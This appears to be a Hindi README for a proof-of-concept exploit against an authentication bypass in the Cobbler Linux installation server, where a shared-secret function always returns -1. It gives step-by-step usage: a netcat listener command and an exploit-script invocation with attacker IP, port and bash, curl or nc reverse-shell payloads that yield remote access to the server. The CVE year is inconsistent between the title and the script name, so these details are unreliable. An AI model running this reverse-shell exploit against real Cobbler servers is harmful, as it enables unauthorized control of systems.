
CVE-2025-47533 Clobber RCE का PoC
Cobbler, एक Linux इंस्टॉलेशन सर्वर जो नेटवर्क इंस्टॉलेशन वातावरण की तीव्र स्थापना को सक्षम बनाता है, में संस्करण 3.0.0 से 3.2.3 और 3.3.7 तक (लेकिन इनमें शामिल नहीं) एक प्रमाणीकरण भेद्यता है। फ़ंक्शन utils.get_shared_secret() हमेशा -1 लौटाता है, जिससे कोई भी खाली उपयोगकर्ता नाम ('') और पासवर्ड -1 के साथ Cobbler XML-RPC इंटरफ़ेस से कनेक्ट हो सकता है। यह नेटवर्क पहुँच वाले हमलावर को Cobbler सर्वर का पूर्ण नियंत्रण प्राप्त करने देता है। यह भेद्यता संस्करण 3.2.3 और 3.3.7 में ठीक की गई है।
भेद्यता utils.get_shared_secret() फ़ंक्शन में साझा गुप्त (shared secret) के अनुचित हैंडलिंग के कारण होती है, जो हमेशा -1 लौटाता है, प्रभावी रूप से प्रमाणीकरण को बायपास करता है। यह किसी भी नेटवर्क उपयोगकर्ता को खाली क्रेडेंशियल्स के साथ Cobbler के XMLRPC इंटरफ़ेस से कनेक्ट होने और मनमाना कमांड निष्पादित करने देता है।
http://<target>:25151/ — Cobbler का XMLRPC API एंडपॉइंट
शोषण स्क्रिप्ट विभिन्न रिवर्स शेल पेलोड का समर्थन करती है, जिनमें शामिल हैं:
nc)अपनी मशीन पर Netcat लिसनर शुरू करें:
nc -lvnp 4444
शोषण स्क्रिप्ट CVE-2024-47533.py चलाएँ।
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : लक्ष्य (उदाहरण: -t http://1<IP_SERVICE>:<PORT>)
-l: स्थानीय IP (उदाहरण: -l 10.10.11.80)
-p : पोर्ट <LOCAL_PORT> (उदाहरण: -p 4444)
--payload: पेलोड (bash, curl, nc) (उदाहरण: --payload bash)
सफल निष्पादन पर, रिवर्स शेल लिसनर से वापस कनेक्ट होगा, जिससे हमलावर को सर्वर तक रिमोट एक्सेस प्राप्त होगा।